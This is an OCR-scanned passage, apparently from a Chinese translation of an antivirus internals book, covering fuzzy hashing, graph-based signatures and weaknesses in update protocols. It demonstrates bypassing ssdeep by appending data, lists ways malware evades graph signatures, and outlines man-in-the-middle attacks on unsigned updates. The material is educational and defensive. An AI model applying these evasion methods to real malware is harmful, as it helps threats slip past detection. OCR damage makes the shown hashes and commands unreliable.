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4.2.1 模糊 散 列 算法 


不 同 于 前 面 提 到 的 加 密 散 列 算法 , 模糊 散 列 特征 码 技 术 不 是 针对 单 文件 进行 查 杀 ,而 是 针对 
文件 集合 进行 检测 查 杀 。 和 加 密 散 列 不 同 的 是 ， 模 糊 散 列 有 以 下 特征 。 
口 变动 小 或 根本 无 变动 ”使 用 模糊 散 列 算法 ， 样 本 文件 的 细小 变动 对 计算 出 的 数值 影响 很 
小 ， 只 对 改动 的 部 分 有 影响 ;而 在 加 密 散 列 算法 中 ， 则 会 得 出 完全 不 同 的 散 列 值 。 

O 没有 进行 混淆 ”可 以 很 清楚 地 依次 分 辨 出 键 与 生成 的 模糊 散 列 值 。 例 如 ， 在 第 一 区 块 中 

的 细小 改动 ， 只 会 影响 第 一 次 生成 输出 的 字 节 。 

口 理想 的 重复 率 ”重复 率 因 不 同 的 业务 场景 而 异 。 例 如 ， 检 测 垃圾 邮件 的 时 候 碰 撞 率 稍 高 
也 是 可 以 接受 的 ,但 在 进行 恶意 软件 侦 测 的 时 候 重复 率 高 就 不 合适 了 因为 高 重复 率 意 
味 着 高 误 报 率 )。 

目前 在 互联 网 上 ， 可 以 查找 到 多 个 加 密 散 列 算 法 的 实例 ， 有 Andrew Tridgell 博 士 编写 的 
SpamSum Jesse Komblum 编 写 的 ssdeep ， 以 及 Joxean Koret 编 写 的 DeepToad。 但 是 ， 截 至 目前 没有 
发 现 有 反 病 毒 厂 商 使 用 这 些 现成 的 实例 , 他 们 大 都 会 自行 开发 加 密 散 列 算法 。 无论 是 厂商 自行 开发 
的 还 是 现成 的 加 密 散 列 算法 ， 其 根本 设计 理念 是 相同 的 ， 都 有 着 前 面 所 讨论 加 密 散 列 的 相关 特性 。 

依据 反 病毒 软件 开发 者 设置 的 冲突 率 以 及 算法 实现 的 质量 , 模糊 散 列 特征 算法 的 误 报 率 会 有 
所 不 同 , 但 通常 情况 下 会 比 其 他 基础 特征 匹配 算法 的 误 报 率 要 低 ( 例如 进行 简单 匹配 或 匹配 校 验 
H) 但 是 ， 由 于 此 类 散 列 特征 算法 存在 固有 缺陷 ， 误 报 还 是 会 发 生 ， 且 此 类 算法 不 能 单独 起 作 
用 。 在 某 些 场景 下 ， 这 类 算法 通常 用 来 校 验 经 过 Bloom 过 滤器 校 验 过 后 的 可 疑 文件 ， 以 降低 扫描 
器 的 误 报 率 。 

和 之 前 的 特征 码 校 验算 法 相 比 , 想 要 绕 过 模糊 散 列 校 验 算法 就 没有 那么 容易 了 。 要 绕 过 加 密 
或 基于 CRC 检 验 技术 的 散 列 函数 , 抑或 简单 特征 匹配 的 检测 算法 , 只 需要 在 合适 的 地 方 对 文件 略 
加 改动 ; 但 想 要 绕 过 模糊 散 列 校 验 算法 ， 因 为 细小 的 改动 不 会 造成 模糊 散 列 值 的 大 变动 ， 所 以 攻 
击 者 需要 对 恶意 软件 进行 一 番 大 改动 。 接 下 来 的 例子 将 会 使 用 ssdeep 演 示 模 糊 散 列 算法 是 如 何 工 
作 的 。 假 设 你 想 使 用 ssdeep 算 法 ,让 编写 的 实验 反 病毒 引擎 在 Ubuntu Linux 平 台 上 去 侦 测 
/bin/ls 。ssdeep 会 生成 下 面 一 段 特征 码 : 

$ md5sum 1s 

fa97c59cc414e42d4e0e853ddf5b4745 1s 

$ ssdeep 1s 

ssdeep,1.1--blocksize:hash:hash, filename 


1536:MW9/ IqY+yF00SZJVWCy62Rnm11PdOHRXSoyZ03uawcfXN4qM1kW:MW9/ZL/T6ilPdotHaqM1kW 
" ls " 


第 一 条 命令 计算 了 指定 文件 的 MD5 值 ， 最 后 一 条 命令 计算 了 指定 文件 的 ssdeep 散 列 值 。 上 述 
输出 结果 中 的 最 后 一 行 是 ssdeep 生 成 的 完整 的 特征 码 : 区 块 大 小 、 散 列 值 ， 加 上 文件 名 的 散 列 。 
现在 让 我 们 在 文件 末尾 增加 一 个 字 节 ， 即 字符 A， 然 后 重新 计算 一 次 MD5 值 和 模糊 散 列 值 : 

$ cp ls ls.mod 


$ echo "A" >> ls.mod 
$ ssdeep ls.mod 
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ssdeep,1.1--blocksize:hash:hash,filename 
1536:MW9/IqY-yFO00SZJVWCy62Rnm1lPdOHRXSoyZ03uawcfXNA4qMlkWP:MW9/ZL/T6ilPdotHagMlk 
WP, "/home/joxean/Documentos/research/books/tahh/chapter4/ls.mod" 

$ md5sum ls.mod 

369£8025d9c99bf166524d782273a4285  ls.mod 


可 以 看 到 MD5 值 彻底 改变 了 , 但 ssdeep 散 列 值 只 变动 了 一 个 字 节 (在 ssdeep 值 未 尾 多 了 一 个 P)。 
如 果 开 发 者 使 用 这 串 模糊 散 列 去 计算 变动 情况 , 将 会 发 现 新 生成 的 文件 同 旧 文 件 异常 相似 , 因此 会 
将 新 生成 的 样本 提示 为 病毒 。 想 要 彻底 改变 通过 模糊 散 列 算法 计算 出 的 散 列 值 , 你 需要 在 文件 的 多 
个 位 置 进行 修改 。 再 来 看 另外 一 个 例子 。 这 次 ， 将 Ubuntu Linux 下 的 文件 cp 附加 到 原文 件 Is 上 : 

$ cp 1s ls.mod 

$ cat /bin/cp >> ls.mod 

$ ssdeep ls.mod 

ssdeep,1.1--blocksize:hash:hash,filename 

3072:MW9/ZL/T6ilPdotHagMlkWSP9GCr/vr/oWwGqP7WiyJpGjTO:3xZLL1doYplkWoUGqP7WiyJpG 

,"ls.mod" 

$ ssdeep 1s 

ssdeep,1.1--blocksize:hash:hash,filename 

1536:MW9/IqY-yF00SZJVWCy62Rnm1lPdOHRXSOoOyZ03uawcfXN4qMlkW:MW9/ZL 


/T6ilPdotHagMlkW 
" ls " 


现在 ， 几 乎 整个 模糊 散 列 值 都 有 了 明显 的 变化 ， 这 样 就 可 以 绕 过 这 种 算法 的 特征 码 检测 了 。 
但 是 , 绕 过 特征 码 检测 需要 变动 位 置 的 数量 由 区 块 大 小 决定 : 如 果 区 块 大 小 取决 于 分 配 的 缓冲 区 
的 大 小 且 不 恒定 , 绕 过 此 类 特征 码 检测 就 较为 容易 。 例如, 让 我 们 再 试 一 次 , 这 次 选用 DeepToad。 
该 工具 允许 你 配置 校 验 选 取 区 块 的 大 小 。 将 区 块 大 小 配置 为 S12 字 节 ， 然 后 计算 两 个 文件 的 散 列 
值 ， 即 原生 的 /bin 和 /ls 文件 ， 以 及 修改 过 的 部 分 : 

$ deeptoad -b=512 1s 

NTWPj4«PililiLmb5ubklJSUl2tra2gMD;j4-«-IiLm5JSXa2gMDDAxpaTw81dUJCSQk;c3P29pqaZWU/P 

7q6GBhSUtDQ4OBCQqSk; 1s 

$ deeptoad -b=512 ls.mod 


NTWPj4+PiIiIiLm5ubklJSUl2tra2gMD;j4+IiLm5JSXa2gMDDAxpaTw81dUJCSQk;jIyhoXV1bW2Fh 
aamsrKwsN7eZWVpaezs;ls.mod 


这 次 通过 把 cp 附加 到 原文 件 ls 上 的 技巧 就 无 法 绕 过 特征 校 验算 法 了 。 有 两 个 原因 : 第 一 ， 
为 DeepToad 校 验 选 取 区 块 大 小 固定 ， 而 不 是 像 ssdeep 一 样 是 动态 选择 的 ; 第 二 ， 因 为 DeepToad 校 
验 了 三 个 不 同 的 散 列 值 ， 由 分 号 分 隔 ， 且 前 两 个 散 列 值 完 全 匹配 。 简 而 言 之 ， 绕 过 模糊 散 列 算法 
取决 于 选取 校 验 区 块 的 大 小 以 及 大 小 的 数值 。 


4.2.2 ”基于 程序 图 的 可 执行 文件 散 列 算 


一 些 高 级 反 病毒 产品 中 会 带 有 基于 程序 图 的 可 执行 散 列 特征 校 验算 法 。 程序 图 可 以 被 分 为 下 
面 两 种 不 同类 型 的 图 。 
口 调用 图 “展示 程序 中 各 函数 调用 关系 的 图 表 〈 即 ， 展 示 程 序 中 所 有 调用 和 被 调用 的 函数 )。 
Q 流程 图 展示 所 有 函数 基础 区 块 和 关系 的 图 表 〈 部 分 只 有 一 个 人 口 点 和 一 个 出 口 点 的 代码 )。 
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反 病 毒 引 擎 中 的 代码 分 析 引 擎 可 能 会 使 用 从 调用 图 (一 张 包 含 程序 中 所 有 函数 的 图 表 ) 或 流 
程 图 (一 张 展示 所 有 函数 基础 区 块 和 关系 的 图 表 ) 中 提取 的 特征 信息 进行 分 析 。 很 显然 , 这 类 算 
法 操作 十 分 消耗 资源 ， 类似 IDA 这 样 的 工具 可 能 需要 花费 数秒 到 数 分 钟 不 等 的 时 间 去 分 析 整 个 软 
件 结构 。 反 病毒 引擎 不 可 能 花费 几 秘 或 几 分 钟 去 分 析 单 个 文件 , 所 以 一 般 会 选取 部 分 指令 和 基础 
区 块 进行 分 析 ， 或 者 设置 一 个 超时 值 ， 超 过 最 大 时 间 限 制 就 不 再 继续 分 析 。 

基于 程序 图 检测 恶意 软件 族 的 特征 引擎 一 般 是 多 态 的 ， 尽 管 真 实 的 指令 会 因 改 动 而 有 所 不 

同 , 但 是 调用 图 和 流程 图 一 般 来 说 不 会 有 变动 。 因 此 , 反 病 毒 软件 工程 师 会 使 用 特定 函数 的 基础 
区 块 的 图 形 特 征 去 解析 恶意 软件 ， 比 如 检测 恶意 软件 解压 缩 或 解密 层 流 程 。 
如 果 没 有 设 定 一 些 限制 或 设 定 不 正确 , 这 种 办 法 也 会 带 来 一 些 性 能 上 的 问题 , 也 可 能 会 和 其 
他 特征 码 算 法 一 样 产生 误 报 。 比 如 ,如果 恶 意 软 件 作者 发 现 反 病毒 软件 基于 恶意 软件 中 某 一 函数 
的 流程 图 特征 ,对 自己 编写 的 恶意 软件 进行 了 检测 查 杀 ,他 可 能 会 模仿 正常 软件 的 函数 ， 编 写 恶 
意 程序 相关 函数 ( 参见 流程 图 )。 他 们 可 能 会 参考 Windows 操 作 系统 上 的 notepad.exe 或 其 他 一 些 正 
常 的 软件 。 因 为 恶意 软件 作者 的 改动 导致 病毒 的 新 变种 同 其 他 正常 软件 的 图 表 特 征 相 似 , 所 以 反 
病毒 工程 师 发 现 需要 针对 新 变种 提取 新 的 特征 ， 而 不 是 在 原 有 特征 基础 上 进行 一 些 修改 。 

对 于 病毒 作者 来 说 ， 以 下 方法 可 以 绕 过 基于 程序 图 的 可 执行 文件 散 列 算法 。 

口 同 之 前 介绍 的 那样 ， 变 更 病毒 程序 流程 图 或 调用 图 的 样式 ， 让 它们 看 起 来 是 正常 软件 的 

口 给 病毒 程序 加 上 反 调 试 功能 ， 这 样 因为 不 理解 单个 或 多 个 调试 指令 ， 病 毒 软件 的 代码 分 

析 引 擎 就 无 法 反 汇 编程 序 内 的 函数 逻辑 。 

口 结合 反 调 试 和 错误 断 点 的 技巧 ， 因 为 错误 的 指令 或 代码 混淆 了 反 病 毒 引 擎 的 分 析 逻 辑 ， 

引擎 无 法 正确 判断 什么 时 候 要 跳 转 ， 也 无 法 分 析 路 径 是 true 还 是 false。 

口 通过 超时 技巧 让 恶意 软件 的 流程 图 变 得 复杂 ， 这 样 反 病毒 引擎 在 进行 代码 分 析 的 时 候 就 
会 因为 超时 而 终止 分 析 。 超 时 终止 会 让 代码 分 析 引 擎 无 法 分 析 部 分 或 全 部 函数 的 流程 图 。 

构造 并 使 用 基于 程序 图 的 特征 码 检测 的 开源 实例 是 GCluster， 我 们 可 以 拿 它 作为 测试 工具 ， 

可 以 在 Pyew 项 目 中 下 载 到 示例 脚本 : http://github.com/joxeankoret/pyew。 

为 了 能 够 分 析出 样本 的 可 疑 度 , 该 工具 通过 分 析 程 序 , 针对 每 个 函数 的 调用 图 和 流程 图 分 别 
建立 二 进 制 列 表 , 并 对 比 了 其 中 的 元 素 、 调 用 图 和 流程 图 。 下 面 是 使 用 该 工具 对 两 个 代码 不 同 但 
结构 ( 调用 图 和 流程 图 ) 完全 吻合 的 恶意 软件 样本 变种 的 分 析 结 

$ /home/joxean/pyew/gcluster.py HGWC.ex_ BypassXtrap.ex_ 

[+] Analyzing file HGWC.ex 
[+] Analyzing file BypassXtrap.ex 
Expert system: Programs are 100% equals 


Primes system: Programs are 100% equals 
ALists system: Programs are 100% equals 


如 果 你 比 对 样本 的 加 密 散 列 值 ， 会 发 现 这 实际 上 是 两 个 不 同 的 文件 : 


$ md5sum HGWC.ex  BypassXtrap.ex _ 
elacaf0572d874301060d813df6640c2e HGWC.ex. 
73be87d0dbcc5ee9863143022ea62f£51  BypassXtrap.ex 
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此 外 ,你 还 会 发 现 , 在 二 进 制 层面 实现 的 模糊 散 列 等 其 他 高 级 特征 码 ， 对 此 类 二 进 制 样 本 文 
件 无 效 ， 如 下 面 使 用 ssdeep 校 验 样本 文件 的 结果 所 示 : 











$ ssdeep HGWC.ex  BypassXtrap.ex ssdeep,1.1-- 
blocksize:hash:hash,filename12288:faWzgMg7v3gnCiMErQohhO0FACCJ81nyC8rm2NY: 
CaHMv6CorjanyC8 

rm2NY,"/home/joxean/pyew/test/graphs/HGWC.ex " 
49152:C1vqjdC8rRDMIEQAePhBi70tIZDMIEQAevrv5GZS/ZoE71LGc2eC6JI 

/Cfnc: 

Civqj9fAxYmlfACr5GZAVETeDI/Cvc,"/home/joxean/pyew/test/graphs 
/BypassXtrap.ex " 


很 明显 , 基于 程序 图 的 特征 码 检测 技术 相 较 于 仅 基于 字 节 码 的 特征 检测 技术 要 强大 得 多 ; 但 
是 , 有 时 出 于 性 能 的 考虑 不 会 使 用 这 种 检测 技术 。 这 也 是 一 些 反 病毒 厂商 不 会 大 规模 使 用 这 种 技 
术 的 原因 : 不 太 实 用 。 
































4.3 Rh 


反 病 毒 特 征 码 在 恶意 软件 防护 中 扮演 着 重要 的 角色 ， 从 反 病 毒 引 擎 成 型 以 来 就 一 直 被 使 用 。 
同时 ， 特 征 码 也 是 某 种 形式 的 数据 库 ， 它 们 与 各 种 匹配 算法 形成 合力 , 用 来 检测 恶意 软件 以 及 恶 
意 软 件 家 族 。 针 对 每 个 特征 码 数据 库 的 类 型 ,本 章 还 展示 了 多 种 绕 过 检测 的 方法 。 特 征 码 数据 库 
的 种 类 如 下 。 

OQ 顾名思义 ， 字 节 流 用 于 与 字符 串 匹 配 算法 相 结 合 去 匹配 可 疑 文件 的 字 节 流 。 

O 校 验 和 ， 比 如 CRC32 校 验 和 算法 ， 用 来 针对 字 节 流 生成 一 个 类 似 签 名 的 标识 符 。 校 验 和 

在 面 对 散 列 冲突 攻击 时 经 常 显得 很 弱 ， 进 而 造成 很 多 误 报 。 

口 与 校 验 和 算法 不 同 ， 加 密 散 列 函 数 对 散 列 冲突 攻击 有 很 强 的 应 对 能 力 ， 不 会 造成 太 多 误 
报 。 但 是 ， 散 列 加 密 需 要 的 时 间 很 长 。 恶 意 软件 制造 者 们 能 够 轻易 绕 过 这 些 算法 ， 因 为 















































CQ 模糊 散 列 函数 用 来 检验 一 个 种 类 的 文件 ， 特 别 是 恶意 软件 及 其 变种 文件 。 与 加 密 散 列 算 
法 不 同 ， 它 有 时 会 产生 可 以 接受 的 冲突 。 冲 突 的 产生 经 常 是 因为 这 些 不 同 散 列 的 恶意 软 
件 属 于 同一 族 。 

口 最 后 ， 基 于 程序 图 的 散 列 算法 从 调用 图 和 流程 图 两 个 方面 分 析 恶 意 的 可 执行 程序 。 相 较 
于 其 他 散 列 算法 ， 生 成 基于 程序 图 的 散 列 值 的 方式 更 费时 ， 同 时 还 需要 反 病 毒 引 擎 有 反 
汇编 并 生成 类 似 图 表 的 能 力 。 但 是 ， 由 于 该 种 算法 通过 基础 区 块 间 的 关系 或 函数 分 析 文 
件 ， 而 不 是 基于 校 验 字 节 流 序列 ， 调 用 图 基于 程序 图 的 散 列 算法 能 十 分 准确 地 侦 测 同一 
个 病毒 的 变种 。 

下 一 章 将 介绍 反 病 毒 软件 的 升级 服务 , 讨论 它们 是 如 何 实现 的 , 然后 通过 实际 的 例子 来 剖析 

以 及 理解 在 真实 世界 中 反 病 毒 软件 是 如 何 进 行 升级 的 。 
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相 比 电脑 上 的 其 他 软件 来 说 反 病 毒 软件 的 更 新 更 为 频 紧 . 每 过 儿 个 小 时 、 z4x, 友 病 END 
毒 厂 商 就 会 发 布 新 的 病毒 数据 库 供用 户 下 载 ， 以 免 受 新 的 计算 机 病毒 的 侵害 。 
所 有 现代 反 病 毒 软件 中 都 带 有 自动 更 新 功能 , 包括 反 病 毒 引擎 在 内 , 连同 特征 码 文件 .GUI、 
工具 、 库 和 其 他 一 些 产品 文件 都 会 被 更 新 。 自 动 升级 会 按照 配置 的 不 同 ， 一 天 更 新 一 次 到 多 次 。 
反 病毒 软件 根据 升级 请 求 的 频率 制定 升级 策略 。 例 如 ,每 日 更 新 的 内 容 一 般 是 推送 给 客户 的 每 日 
特征 码 更 新 。 另 一 方面 ， 每 周 更 新 一 般 包含 大 量 稳定 特征 码 的 修订 更 新 包 。 
因为 可 能 在 一 次 升级 后 , 反 病 毒 软 件 的 整个 特征 库 和 插件 文件 都 有 了 变动 ,所 以 反 病 毒 软件 
的 升级 规则 并 不 固定。 升级 文件 的 大 小 和 组 成 部 分 很 大 程度 上 取决 于 反 病 毒 软 件 使 用 的 插件 和 特 
征 码 格式 。 如 果 反 病毒 厂商 使 用 了 装载 插件 和 特征 码 的 容器 , 那 每 次 反 病毒 软件 升级 的 时 候 整 个 
容器 都 需要 进行 更 新 。 但 是 ,如果 厂 商 分 模块 发 布 更 新 ， 那 每 次 更 新 的 时 候 ， 只 需要 更 新 对 应 的 
模块 即 可 。 
本 章 将 讨论 反 病 毒 厂 商 使 用 的 各 种 更 新 协议 及 其 存在 的 缺陷 , 接着 详解 反 病毒 软件 的 更 新 协 
议 ， 最 后 将 对 当前 所 使 用 HTTPS 检 查 方式 解决 一 个 问题 但 带 来 一 系列 其 他 问题 的 原因 进行 剖析 。 


5.1 理解 更 新 协议 


每 家 反 病 毒 厂商 , 甚至 是 每 一 款 反 病毒 产品 ， 都 有 着 不 同 的 更 新 协议 、 策 略 、 特 征 码 和 插件 

分 发 计划 等 ; 但 这 些 更 新 协议 之 间 也 存在 着 如 下 一 些 共性 。 

口 使 用 HTTP 或 HTTPS 协 议 (或 两 者 同时 使 用 ) 下 载 特征 文件 ”在 少数 情况 下 ， 也 会 用 到 

FTP 协 议 〈 主要 是 在 已 废弃 的 或 旧 的 产品 中 )。 

口 使 用 目录 式 文件 下 载 文件 及 其 对 应 远程 URI 或 URL 列 表 会 被 存储 在 一 个 或 多 个 目录 式 

文件 中 。 这 类 目录 式 文件 可 能 会 包含 支持 的 平台 和 不 同 产品 版 本 等 信息 。 

OQ 下 载 升级 文件 校 验 ”更 新 旧 文 件 之 前 下 载 的 更 新 文件 首先 会 经 过 验证 。 尺 管 每 款 反 病毒 
产品 都 有 验证 流程 ， 但 因 产 品 而 异 ， 有 些 只 是 经 过 一 次 简单 的 CRC 算 法 校 验 ， 也 有 一 些 
使 用 校 验 RSA 签 名 。 

从 理论 层面 上 来 分 析 反 病毒 软件 的 更 新 协议 ， 其 工作 流程 如 下 。 

(1) 反 病 毒 产品 会 定期 通过 访问 指定 URL ( 如 http://av.com/modified-date ) 从 网 络 上 下 载 文件 
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到 本 地 。 下 载 的 文件 包括 更 新 准备 状态 的 元 数据 。 

(2) 反 病 毒 客 户 端 会 给 出 最 近 一 次 更 新 的 日 期 。 如 果 从 网 上 下 载 的 更 新 指引 文件 比 最 后 一 次 
更 新 日 期 更 晚 ， 反 病毒 软件 更 新 程序 会 通过 URL ( 如 http://av.com/catalog.ini ) 下 载 一 个 内 有 所 有 
可 供 下 载 的 更 新 文件 的 目录 文件 。 

(3) 无论 是 XML 格式 还 是 简单 老 旧 的 INI 文 件 格 式 ,， 下载 的 目录 文件 会 针对 产品 、 兼 容 的 平台 
和 操作 系统 ( 比如 ，Windows 7x86 _64 或 Solaris 10 SPARC ) 分 成 不 同 的 部 分 。 每 个 部 分 都 包含 要 
升级 的 文件 信息 ,一 般 情况 下 , 这 类 信息 包括 要 升级 的 文件 名 , 以 及 之 后 校 验 要 用 到 的 散 列 值 ( EG 
如 ，MD5 值 )。 

(4) 如 果 在 线 更 新 列表 的 文件 MD5 值 和 客户 端 文件 的 MD5 值 不 同 ， 那 么 这 些 更 新 文件 就 会 被 
下 载 到 电脑 中 。 

(5) 反 病 毒 软件 更 新 程序 会 校 验 下 载 文件 的 MD5， 以 确保 在 传输 过 程 中 没有 发 生 错 误 。 

(6) 如 果 下 载 的 文件 通过 校 验 ， 就 会 停止 待 更 新 服务 ， 备 份 旧 文 件 至 相关 目录 ， 并 将 新 的 文 
件 复制 至 对 应 目录 ， 然 后 重启 相关 服务 。 

以 上 从 理论 层面 讲解 了 真实 情况 下 反 病 毒 软件 更 新 引擎 的 工作 方式 。 在 接 下 来 的 几 节 你 会 看 
到 更 多 例子 。 


















































5.1.1 支持 SSL/TLS 


安全 套 接 字 层 ( Secure Sockets Layer, SSL ) 和 传输 层 安全 性 协议 (Transport Layer Security , 
TLS ) 是 用 于 在 因特网 或 局 域 网 内 构建 安全 传输 通道 的 加 密 协议 。 这 两 个 协议 使 用 X.509 认 证 方 
式 (一 种 非 对 称 加 密 技术 ) 来 交换 随机 session key， 用 于 对 称 加 密 解 密 随 后 的 流量 。SSL 协 议 用 
于 网 上 银行 以 及 其 他 敏感 信息 的 传输 。 对 于 更 新 协议 来 说 ， 尤 其 是 在 安全 软件 ( 如 反 病 毒 软件 ) 
H, 使 用 类 似 安全 通信 协议 是 一 项 基本 要 求 。 糟 糕 的 是 , 许多 反 病 毒 软件 并 没有 使 用 这 些 安全 通 
信 协 议 。 反 病毒 软件 中 最 常用 的 传输 协议 是 之 前 提 到 的 超 文本 传输 协议 ( Hypertext Transfer 
Protocol, HTTP )， 而 不 是 基于 SSL/TLS 实 现 的 超 文本 安全 传输 协议 ( Hypertext Transfer Protocol 
Secure，HTTPS )。 使 用 HTTP 协 议 进 行 软件 更 新 会 让 各 种 可 能 的 攻击 破门 而 入 。 

O 如 果 攻 击 者 更 改 DNS 记录 ， 反 病毒 软件 客户 端 会 连接 到 恶意 的 耻 地 址 并 下 载 对 应 的 文件 。 

由 于 HTTP 协 议 中 没有 使 用 证 书 ， 反 病毒 客户 端 并 没有 校 验 升 级 服务 器 是 否 为 官方 服务 
f o 
口 如 果 攻 击 者 在 局 域 网 内 发 起 中 间 人 劫持 攻击 (man-in-the-middle，MITM ), 在 更 新 过 程 中 
就 可 以 修改 正常 更 新 文件 以 及 更 新 目录 中 的 对 应 散 列 校 验 值 ， 并 将 恶意 文件 或 植 人 了 木 
马 病毒 的 反 病毒 产品 推送 给 客户 端 。 
反 病 毒 产 品 使 用 基于 HTTP 协 议 的 不 安全 且 末 加 密 的 更 新 协议 ,通常 基于 以 下 考虑 。 
口 简单 ”编写 基于 HTTP 的 更 新 协议 比 正确 使 用 HTTPS 协 议 编写 来 得 简单 。 
口 性 能 “由 于 不 需要 考虑 SSL 或 TLS 层 的 负载 ， 通 过 HTTP 协 议 下 载 更 新 文件 会 比 使 用 
HTTPS 协 议 快 得 多 。 尽 管 现在 使 用 SSL 或 TLS 对 性 能 带 来 的 影响 微乎其微 ， 但 是 一 些 反 
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病毒 产品 的 第 一 版 很 可 能 是 10 年 或 20 年 前 编写 的 。 那 时 候 ，SSL 或 TLS 还 是 会 带 来 一 定 
的 性 能 影响 的 。 但 现在 看 来 ， 其 性 能 影响 完全 可 以 忽略 不 计 。 

OQ 糟糕 的 编程 能 力 ” 一些 反 病毒 工程 师 和 设计 者 没有 足够 的 安全 意识 ， 或 对 协议 引擎 的 基 
本 安全 需求 缺少 正确 的 认识 。 有 一 些 反 病毒 厂商 在 开发 完 第 一 版 更 新 协议 以 后 ， 会 沿用 
好 多 年 ， 甚 至 有 一 些 反 病毒 软件 的 更 新 协议 是 在 20 世 纪 末 到 21 世 纪 初 设计 开发 的 。 
你 可 能 会 注意 到 ， 上 述 列 表 中 用 到 了 “正确 ”一 词 ， 这 是 为 了 强调 目前 反 病 毒 软件 实施 的 更 
新 协议 的 简单 解决 方案 是 错误 的 。 包 括 一 些 软件 开发 者 和 设计 者 在 内 的 许多 人 都 认为 , 他 们 只 需 
让 协议 支持 SSL/TLS 就 可 以 了 , 不 用 去 考虑 安全 的 操作 方式 ， 从 而 往往 在 不 经 意 间 使 用 存在 缺陷 
的 传输 协议 。 结 果 ， 你 可 以 观察 到 如 下 差异 。 
O 使 用 SSL/TLS 的 时 候 不 校 验 服务 器 端的 证 书 这 是 最 典型 的 错误 之 一 。 开 发 者 增加 了 安全 
传输 的 功能 ， 但 在 这 个 过 程 中 没有 编写 校 验 服务 器 身份 的 代码 逻辑 。 殊 不 知 这 和 在 传输 
过 程 中 出 于 性 能 消耗 的 原因 不 使 用 SSL/TLS 一 样 糟糕 。Google_ Chrome 这 样 的 浏览 器 以 及 
Microsoft 开 发 的 安全 产品 EMET 都 提供 数字 证 书 验证 功能 ， 以 验证 服务 器 的 真实 身份 。 

口 使 用 自 签 名 的 证 书 一 些 厂 商 可 能 会 使 用 自 签名 的 数字 证 书 验证 其 更 新 服务 器 ， 而 不 是 经 
过 认证 机 构 签名 的 数字 证 书 , 这 也 就 意味 着 其 数字 证 书 并 没有 被 添加 到 客户 端 数字 证 书信 
任 列表 中 。 在 这 种 情况 下 ( 和 之 前 认证 服务 器 身份 代码 逻辑 缺失 的 案例 类 似 )， 客 户 端 将 
会 接受 任意 同 厂商 自 签名 数字 证 书 类 似 的 证 书 。 简 而 言 之 ， 这 和 上 面 那 种 情况 一 样 糟糕 。 
另外 ， 因 为 自 签 名 证 书 的 工作 逻辑 ， 其 不 能 被 撤销 。 因 此 ， 如 果 攻 击 者 获取 到 了 反 病 毒 
厂商 的 私 钥 ， 只 要 安装 在 客户 端 内 的 对 应 证 书 没 有 被 撤销 ， 就 可 以 继续 实施 中 间 人 劫持 
攻击 了 。 但 是 ， 如 果 使 用 认证 机 构 的 证 书 ， 即 使 出 了 问题 ， 数 字 证 书 也 可 以 迅速 被 撤销 
并 失效 。 由 于 是 由 已 知 的 可 信赖 的 认证 机 构 发 行 的 证 书 ,客户 端 会 自动 信任 新 的 数字 证 书 。 

O 接受 有 效 但 过 期 的 证 书 ”数字 证 书 会 在 一 段 时 间 后 过 期 。 如 果 由 于 事务 繁忙 或 轻视 ， 没 
有 注意 到 数字 证 书 已 经 过 了 有 效 期 ， 就 会 导致 数字 证 书 失 效 ， 从 而 引发 客户 端 拒 绝 下 载 
更 新 文件 。 也 因为 这 样 ， 有 时候 过 期 的 证 书 也 能 被 客户 端 接受 。 


5.1.2 ”验证 更 新 文件 


大 多 数 反 病毒 产品 可 能 会 裁 跟头 的 地 方 是 对 已 下 载 的 更 新 文件 进行 校 验 , 可 以 将 验证 流程 简 
化 为 : 

(1) 通过 传输 协议 ( 可 能 是 HTTP 协 议 ) 下 载 包含 待 下 载 更 新 文件 列表 及 其 对 应 散 列 值 的 目录 
文件 ; 

Q) 下 载 目 录 文 件 中 的 对 应 更 新 文件 ; 

(3) 校 验 已 下 载 文件 的 散 列 值 。 

验证 散 列 值 常 通过 对 比 已 下 载 的 更 新 文件 与 目录 文件 中 对 应 的 MD5 或 SHA1 散 列 值 实现 。 在 
极 少数 情况 下 ， 就 像 之 前 Joxean Koret 在 DrWeb 反 病毒 产品 中 发 现 的 一 个 古老 而 严重 的 漏洞 一 样 
(参见 第 15 章 ), 程序 也 会 使 用 CRC32 校 验 代替 使 用 加 密 散 列 校 验 。 将 已 下 载 的 更 新 文件 的 散 列 值 
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与 目录 文件 中 对 应 的 散 列 值 进行 对 比 是 完全 正确 的 做 法 。 这 种 方法 也 存在 缺点 : 如 果 目 录 文件 中 
包含 的 散 列 值 已 经 被 攻击 者 修改 过 了 呢 ? 攻击 者 有 能 力 修改 目录 文件 中 存储 的 散 列 值 , 也 有 能 
修改 传输 的 文件 。 这 样 的 攻击 行为 不 会 让 反 病毒 软件 的 更 新 程序 提示 异常 ， 因为 已 下 载 的 更 新 文 
件 同 目录 文件 中 的 散 列 值 完全 吻合 ,在 一 些 典型 的 场景 中 ,黑客 控制 了 反 病 毒 软件 的 更 新 服务 器 ， 
并 向 反 病 毒 软 件 的 用 户 推 送 恶意 更 新 。 因 此 ， 这 不 是 最 完美 的 解决 方案 。 

在 少数 案例 中 ， 反 病毒 产品 通过 使 用 签名 算法 ( 如 ,使 用 RSA ) 实现 了 针对 更 新 文件 的 校 验 
和 完整 性 检查 。 数 字 签 名 也 用 于 验证 文件 在 开发 并 传输 的 过 程 中 是 否 被 修改 。 数 字 签名 适用 于 可 
执行 程序 ， 有 时 候 也 适用 于 脚本 文件 。 例 如 ，Microsoft 对 每 个 通过 Windows Update ( Microsoft 
Windows Security Essentials 的 更 新 协议 ) 下 载 的 .CAB 文 件 (档案 文件 格式 ) 添加 了 数字 签名 ， 同 
时 ， 也 要 求 运 行 在 x64 平 台 上 的 驱动 文件 (.SYS ) 在 被 加 载 前 经 过 数字 签名 校 验 。 如 果 使 用 了 数 
字 签 名 技术 ， 即 使 是 使 用 不 安全 的 HITTP 协 议 传输 更 新 文件 ， 也 可 以 保证 文件 是 真实 的 ， 没 有 被 
算 改 过 。 这 是 因为 如 果 要 算 改 更 新 文件 ， 攻 击 者 必须 创建 一 个 具有 有 效 数 字 签 名 的 二 进 制 文件 。 
日 攻 击 者 可 以 完成 这 种 攻击 的 概率 微乎其微 , 因为 从 数字 签名 发 行商 偷 取 数 字 签 名 或 重建 签名 的 
私 钥 可 能 性 几乎 为 零 。 不 过 这 也 不 是 没有 发 生 过 ， 据 称 可 能 由 某国 支持 开发 的 “火焰 病毒 "， 就 
通过 MD5 碰 撞 攻 击 生 成 了 合法 的 终端 服务 器 授权 证 书 。 

签名 和 完整 性 检查 正在 逐渐 被 大 多 数 主要 防 病毒 产品 所 采用 。 然 而 ， 大 多 数 情况 下 仅 限 于 
